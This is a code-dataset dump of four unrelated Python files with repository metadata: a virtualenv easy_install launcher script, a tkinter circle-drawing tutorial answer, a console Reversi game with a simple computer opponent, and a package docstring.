49b7c6233cb3d031e79f2710167aae956de76e29 | 55a281d728541773e6eda896599c0cc48dfe5156 | /Advanced/venv/Scripts/easy_install-script.py | 8e473e4d78117e10d75b080582317f8367fd492a | [] | no_license | dhariskov/python-advanced | c0bebd937f3849dd62ae2834cbdf9f8100b2bb56 | 4725070c960d3c234ed2f20ff2156e2f89514a02 | refs/heads/master | 2022-12-04T22:40:18.485552 | 2020-08-28T08:29:25 | 2020-08-28T08:29:25 | 288,775,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 450 | py | #!C:\Users\Acer\PycharmProjects\Advanced\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
| [
"[email protected]"
] | |
f636068a81116528616e1f63c07c412447c94e49 | c5be6a92f216957d340474b58507606a38c10f5f | /course-files/tutorials/tutorial04/answers/drawings/d5.py | e0e46a2f538962b9b15a80780794e0fa647bfa31 | [] | no_license | eecs110/winter2019 | 0b314c35e886b8099368ed7dfd51b707ab73c0c2 | f4107207ca1c9c10b78bdbb74fd82410b00ee363 | refs/heads/master | 2020-04-11T10:09:28.100445 | 2019-03-21T18:00:25 | 2019-03-21T18:00:25 | 161,705,160 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 860 | py | from tkinter import Canvas, Tk
import random
import shapes
import math
gui = Tk()
gui.title('Circle')
canvas = Canvas(gui, width=500, height=500, background='#FFFFFF')
canvas.pack()
########################## YOUR CODE BELOW THIS LINE ##############################
center_x = 250
center_y = 250
distance_from_center = 50
radius_of_individual_circle = 100
num_circles = 30
for i in range(num_circles):
    # Calculate the new position of x and y: angle = 2*pi*i/num_circles
    # from the positive x-axis; canvas y grows downward, hence center_y - dy.
radians = 360 / num_circles * i * (math.pi / 180)
dy = distance_from_center * math.sin(radians)
dx = distance_from_center * math.cos(radians)
x = center_x + dx
y = center_y - dy
shapes.make_circle(canvas, (x, y), radius_of_individual_circle, color=None, outline='black', stroke_width=1)
########################## YOUR CODE ABOVE THIS LINE ##############################
canvas.mainloop() | [
"[email protected]"
] | |
83f402a7ec1b6a4bf2e2ac6f13ff695c108fcf0c | 44ff565bb1838a445e0d5a89ea3ca3e4b29b3686 | /Python算法详解/第12章/Reversi.py | 0a81667472893c1c0099a99a2e84e5b90021e743 | [] | no_license | huoweikong/python_pch_kiton | df3162aae397e82df9ef575f5f9d26039e5e036e | 057cef1f34c76701840e7b8b46a5955b9f38b86b | refs/heads/master | 2023-01-10T22:40:45.610986 | 2020-11-19T18:37:56 | 2020-11-19T18:37:56 | 313,897,428 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,262 | py | # Reversegam: a clone of Othello/Reversi
import random
import sys
WIDTH = 8 # Board is 8 spaces wide
HEIGHT = 8 # Board is 8 spaces tall
def drawBoard(board):
# This function prints the board that it was passed. Returns None.
print(' 12345678')
print(' +--------+')
for y in range(HEIGHT):
print('%s|' % (y+1), end='')
for x in range(WIDTH):
print(board[x][y], end='')
print('|%s' % (y+1))
print(' +--------+')
print(' 12345678')
def getNewBoard():
# Creates a brand-new, blank board data structure.
board = []
for i in range(WIDTH):
board.append([' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '])
return board
def isValidMove(board, tile, xstart, ystart):
    # Return False if the player's move at xstart, ystart is invalid. If it
    # is a valid move, return a list of the spaces that would become the
    # player's tiles if the player moved here.
if board[xstart][ystart] != ' ' or not isOnBoard(xstart, ystart):
return False
if tile == 'X':
otherTile = 'O'
else:
otherTile = 'X'
tilesToFlip = []
for xdirection, ydirection in [[0, 1], [1, 1], [1, 0], [1, -1], [0, -1], [-1, -1], [-1, 0], [-1, 1]]:
x, y = xstart, ystart
x += xdirection # First step in the x direction
y += ydirection # First step in the y direction
while isOnBoard(x, y) and board[x][y] == otherTile:
            # Keep moving in this x, y direction.
x += xdirection
y += ydirection
if isOnBoard(x, y) and board[x][y] == tile:
            # There are pieces to flip over. Go in the reverse direction
            # until we reach the original space, noting all the tiles
            # along the way.
while True:
x -= xdirection
y -= ydirection
if x == xstart and y == ystart:
break
tilesToFlip.append([x, y])
    if len(tilesToFlip) == 0: # If no tiles were flipped, this is not a valid move.
return False
return tilesToFlip
def isOnBoard(x, y):
    # Return True if the coordinates are located on the board.
return x >= 0 and x <= WIDTH - 1 and y >= 0 and y <= HEIGHT - 1
def getBoardWithValidMoves(board, tile):
    # Return a new board with '.' marking the valid moves the given player can make.
boardCopy = getBoardCopy(board)
for x, y in getValidMoves(boardCopy, tile):
boardCopy[x][y] = '.'
return boardCopy
def getValidMoves(board, tile):
    # Return a list of [x, y] lists of valid moves for the given player on the given board.
validMoves = []
for x in range(WIDTH):
for y in range(HEIGHT):
if isValidMove(board, tile, x, y) != False:
validMoves.append([x, y])
return validMoves
def getScoreOfBoard(board):
    # Determine the score by counting the tiles. Return a dictionary with keys 'X' and 'O'.
xscore = 0
oscore = 0
for x in range(WIDTH):
for y in range(HEIGHT):
if board[x][y] == 'X':
xscore += 1
if board[x][y] == 'O':
oscore += 1
return {'X':xscore, 'O':oscore}
def enterPlayerTile():
    # Let the player enter the tile they want to be.
    # Return a list with the player's tile as the first item and the computer's tile as the second.
tile = ''
while not (tile == 'X' or tile == 'O'):
print('Do you want to be X or O?')
tile = input().upper()
# The first element in the list is the player's tile, and the second is the computer's tile.
if tile == 'X':
return ['X', 'O']
else:
return ['O', 'X']
def whoGoesFirst():
# Randomly choose who goes first.
if random.randint(0, 1) == 0:
return 'computer'
else:
return 'player'
def makeMove(board, tile, xstart, ystart):
# Place the tile on the board at xstart, ystart, and flip any of the opponent's pieces.
# Returns False if this is an invalid move; True if it is valid.
tilesToFlip = isValidMove(board, tile, xstart, ystart)
if tilesToFlip == False:
return False
board[xstart][ystart] = tile
for x, y in tilesToFlip:
board[x][y] = tile
return True
def getBoardCopy(board):
# Make a duplicate of the board list and return it.
boardCopy = getNewBoard()
for x in range(WIDTH):
for y in range(HEIGHT):
boardCopy[x][y] = board[x][y]
return boardCopy
def isOnCorner(x, y):
# Returns True if the position is in one of the four corners.
return (x == 0 or x == WIDTH - 1) and (y == 0 or y == HEIGHT - 1)
def getPlayerMove(board, playerTile):
# Let the player enter their move.
# Returns the move as [x, y] (or returns the strings 'hints' or 'quit').
DIGITS1TO8 = '1 2 3 4 5 6 7 8'.split()
while True:
print('Enter your move, "quit" to end the game, or "hints" to toggle hints.')
move = input().lower()
if move == 'quit' or move == 'hints':
return move
if len(move) == 2 and move[0] in DIGITS1TO8 and move[1] in DIGITS1TO8:
x = int(move[0]) - 1
y = int(move[1]) - 1
if isValidMove(board, playerTile, x, y) == False:
continue
else:
break
else:
print('That is not a valid move. Enter the column (1-8) and then the row (1-8).')
            print('For example, 81 will be the top-right corner.')
return [x, y]
def getComputerMove(board, computerTile):
# Given a board and the computer's tile, determine where to
# move and return that move as a [x, y] list.
possibleMoves = getValidMoves(board, computerTile)
random.shuffle(possibleMoves) # randomize the order of the moves
# Always go for a corner if available.
for x, y in possibleMoves:
if isOnCorner(x, y):
return [x, y]
# Find the highest-scoring move possible.
bestScore = -1
for x, y in possibleMoves:
boardCopy = getBoardCopy(board)
makeMove(boardCopy, computerTile, x, y)
score = getScoreOfBoard(boardCopy)[computerTile]
if score > bestScore:
bestMove = [x, y]
bestScore = score
return bestMove
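# Editor's note: getComputerMove is a one-ply greedy heuristic. It prefers
# corners (corner tiles can never be flipped back) and otherwise picks the
# move that maximizes the immediate score; it does no lookahead.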
def printScore(board, playerTile, computerTile):
scores = getScoreOfBoard(board)
print('You: %s points. Computer: %s points.' % (scores[playerTile], scores[computerTile]))
def playGame(playerTile, computerTile):
showHints = False
turn = whoGoesFirst()
print('The ' + turn + ' will go first.')
# Clear the board and place starting pieces.
board = getNewBoard()
board[3][3] = 'X'
board[3][4] = 'O'
board[4][3] = 'O'
board[4][4] = 'X'
while True:
playerValidMoves = getValidMoves(board, playerTile)
computerValidMoves = getValidMoves(board, computerTile)
if playerValidMoves == [] and computerValidMoves == []:
return board # No one can move, so end the game.
elif turn == 'player': # Player's turn
if playerValidMoves != []:
if showHints:
validMovesBoard = getBoardWithValidMoves(board, playerTile)
drawBoard(validMovesBoard)
else:
drawBoard(board)
printScore(board, playerTile, computerTile)
move = getPlayerMove(board, playerTile)
if move == 'quit':
print('Thanks for playing!')
sys.exit() # Terminate the program.
elif move == 'hints':
showHints = not showHints
continue
else:
makeMove(board, playerTile, move[0], move[1])
turn = 'computer'
elif turn == 'computer': # Computer's turn
if computerValidMoves != []:
drawBoard(board)
printScore(board, playerTile, computerTile)
input('Press Enter to see the computer\'s move.')
move = getComputerMove(board, computerTile)
makeMove(board, computerTile, move[0], move[1])
turn = 'player'
print('Welcome to Reversegam!')
playerTile, computerTile = enterPlayerTile()
while True:
finalBoard = playGame(playerTile, computerTile)
# Display the final score.
drawBoard(finalBoard)
scores = getScoreOfBoard(finalBoard)
print('X scored %s points. O scored %s points.' % (scores['X'], scores['O']))
if scores[playerTile] > scores[computerTile]:
print('You beat the computer by %s points! Congratulations!' % (scores[playerTile] - scores[computerTile]))
elif scores[playerTile] < scores[computerTile]:
print('You lost. The computer beat you by %s points.' % (scores[computerTile] - scores[playerTile]))
else:
print('The game was a tie!')
print('Do you want to play again? (yes or no)')
if not input().lower().startswith('y'):
break
| [
"[email protected]"
] | |
0bc96e095f2069bc9811ef311b2dee119285ae92 | 9c88b828b783e23b50186a2cbba2c08610d8d10d | /espressodb/documentation/__init__.py | c16020e168c1d82085be018508a3cd3600a84a63 | [
"BSD-3-Clause"
] | permissive | remram44/espressodb | 9a51219c0e7ec6e4c400578d02b97ef95024ba1e | 5aad7222ab81c0f1694b51171e5d197dbcc8a65f | refs/heads/master | 2020-12-08T06:07:43.736419 | 2020-01-12T20:31:20 | 2020-01-12T20:31:20 | 232,909,755 | 0 | 0 | BSD-3-Clause | 2020-01-09T21:29:09 | 2020-01-09T21:29:08 | null | UTF-8 | Python | false | false | 170 | py | """The documentations module provides a web page which summarizes the implemented models
which derive from the EspressoDB :class:`espressodb.base.models.Base` class.
"""
| [
"[email protected]"
] |